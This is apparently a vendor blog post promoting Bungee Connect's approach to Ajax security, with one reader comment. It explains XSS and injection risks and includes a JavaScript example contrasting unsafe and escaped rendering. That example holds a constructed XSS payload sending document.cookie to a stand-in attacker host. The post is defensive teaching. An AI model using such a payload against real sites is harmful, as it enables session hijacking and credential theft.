How do you get interactivity, securely?


Recently I wrote about why rich interactivity matters, but what are the security concerns that come with it? Ajax has made new kinds of web applications possible by bringing the interactivity usually seen only on the desktop to the web browser. Google Maps and countless other web applications now add interactivity throughout the application.

It isn’t easy, though. Interactivity is often cobbled onto an existing application with a mish-mash of technologies and line after line of hand-written JavaScript, a Frankenstein that is hard to maintain and that widens the attack surface exposed to the user, the server and the data behind it.

When using JavaScript, two big classes of vulnerability stand out:

  • Cross-site scripting (XSS) occurs when attacker-controlled input reaches a page without being escaped, so the attacker’s script runs in the victim’s browser with the trust (cookies, session, same-origin access) of the site that served the page. This type of attack can lead to session hijacking, credential theft and actions performed in the victim’s name against data and subsystems.
  • Injection vulnerabilities exist when attacker-supplied input is concatenated into a command the server interprets, such as a SQL query, a shell command or a file path, so that data is parsed as part of the command and the attacker gains access to the file system or the data store.
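
As an added example (not code from the original post or from Bungee Connect), the XSS case from the first bullet in working JavaScript: the same Ajax response rendered the unsafe way and the escaped way. The response object and the attacker payload are constructed for the example; in a real page the data would come back from XMLHttpRequest or fetch and originate from other users.

```javascript
// Added example, not code from the original post or from Bungee Connect.
// The Ajax "response" is a constructed sample; in a real page it would come
// back from XMLHttpRequest/fetch and carry data the server stored from users.

const sampleResponse = {
  user: 'mallory',
  // Constructed attacker payload: profile text the server stored verbatim.
  bio: '<img src=x onerror="document.location=\'https://evil.example/?c=\'+document.cookie">',
};

// Vulnerable pattern: untrusted data interpolated straight into markup
// (the string equivalent of element.innerHTML = ...). The browser parses the
// payload as HTML and runs the onerror handler with the site's own origin.
function renderProfileUnsafe(profile) {
  return `<div class="profile"><h2>${profile.user}</h2><p>${profile.bio}</p></div>`;
}

// Hardened pattern: escape the characters that can change HTML context
// before data is placed in an element body or a quoted attribute.
// (In a live DOM, assigning to element.textContent achieves the same thing.)
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

function renderProfileSafe(profile) {
  return `<div class="profile"><h2>${escapeHtml(profile.user)}</h2><p>${escapeHtml(profile.bio)}</p></div>`;
}

// Check used in the demo: strip the template's own tags and see whether any
// tag is left. Anything that remains came from the data, not the template.
const TEMPLATE_TAGS = /<\/?(?:div|h2|p)(?:\s[^>]*)?>/g;

function containsInjectedMarkup(html) {
  return /<[a-z!\/]/i.test(html.replace(TEMPLATE_TAGS, ''));
}

// Demo run: the unsafe render carries an <img onerror=...> tag, the safe one
// carries the same characters as inert text.
console.log('unsafe injected:', containsInjectedMarkup(renderProfileUnsafe(sampleResponse)));
console.log('safe injected:  ', containsInjectedMarkup(renderProfileSafe(sampleResponse)));
```

The same discipline applies when the response is JSON: parse it with `JSON.parse` rather than evaluating the text, or a server that echoes user input has handed the attacker an eval on every client.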

These are very important concerns for a business to consider as they begin adding interactivity to their site. Managing these risks requires a significant investment in time and resources throughout the life of an application.

Are these risks, and the cost of managing them, just the price of adding interactivity? At Bungee we don’t believe it is.

Bungee Connect takes a strong stance on security through a unique approach to these issues:

  • Cross-site scripting is prevented by moving all access to other domains and sites to the server, never the client. Every request and response is fetched and parsed by the server before anything is sent down to the client, so third-party content is never handed to the browser as raw markup; if the server encounters something it does not expect, the content is dropped rather than passed through. The server still has to treat that content, and any user-supplied data, as untrusted when it renders it.
  • Injection vulnerabilities are reduced by removing all application code from the client and keeping it on the server. Users (and potential attackers) cannot see how the business logic is executed or which sub-systems or databases are accessed, which makes it much harder to work out what inputs a given function expects and to replay its request with malicious data. Instead of application-specific client-side code, a generic JavaScript engine handles communication between client and server. That engine refers to objects and functions by opaque identifiers, and the identifiers change with each session, so a request captured in one session cannot be replayed in another. In this way the Bungee Connect JavaScript engine acts as a sandbox for any Bungee-powered application. Hiding the logic is not a substitute for validating inputs, though: the server still has to check every argument it receives before it reaches a file system or database.
  • The JavaScript payload is a single, fixed package that does not change as the application changes. A security team can validate this package once and be confident that later application changes will not open new vulnerabilities in the client, which significantly reduces the work required to deliver an application. Server-side logic changes still need review; only the client-side engine is fixed.

Users are demanding more interactivity, but that doesn’t mean you need to sacrifice security or increase the cost of delivering an application. By employing a generalized JavaScript engine through Bungee Connect you can add the interactivity you need with less development time and strong security.

1 Comment »

  1. Granted, this approach does provide substantial security benefit and simplified deployment.

    The downfall, in this specific area, is in integration with tools and solutions already in place in JavaScript. Integrating Google Analytics, in particular, is proving to be incredibly difficult in BungeeConnect, whereas it is a simple copy/paste function in a more traditional web app (HTML, PHP, RoR, ASP.net, etc.)

    Other JavaScript APIs, like that of OpenSocial, require generating a JavaScript wrapper, and then passing query parameters to an iframe, instead of running the app in the client’s DOM; a less than optimal solution that still requires developers to use, and know, JavaScript, as well as BungeeConnect.
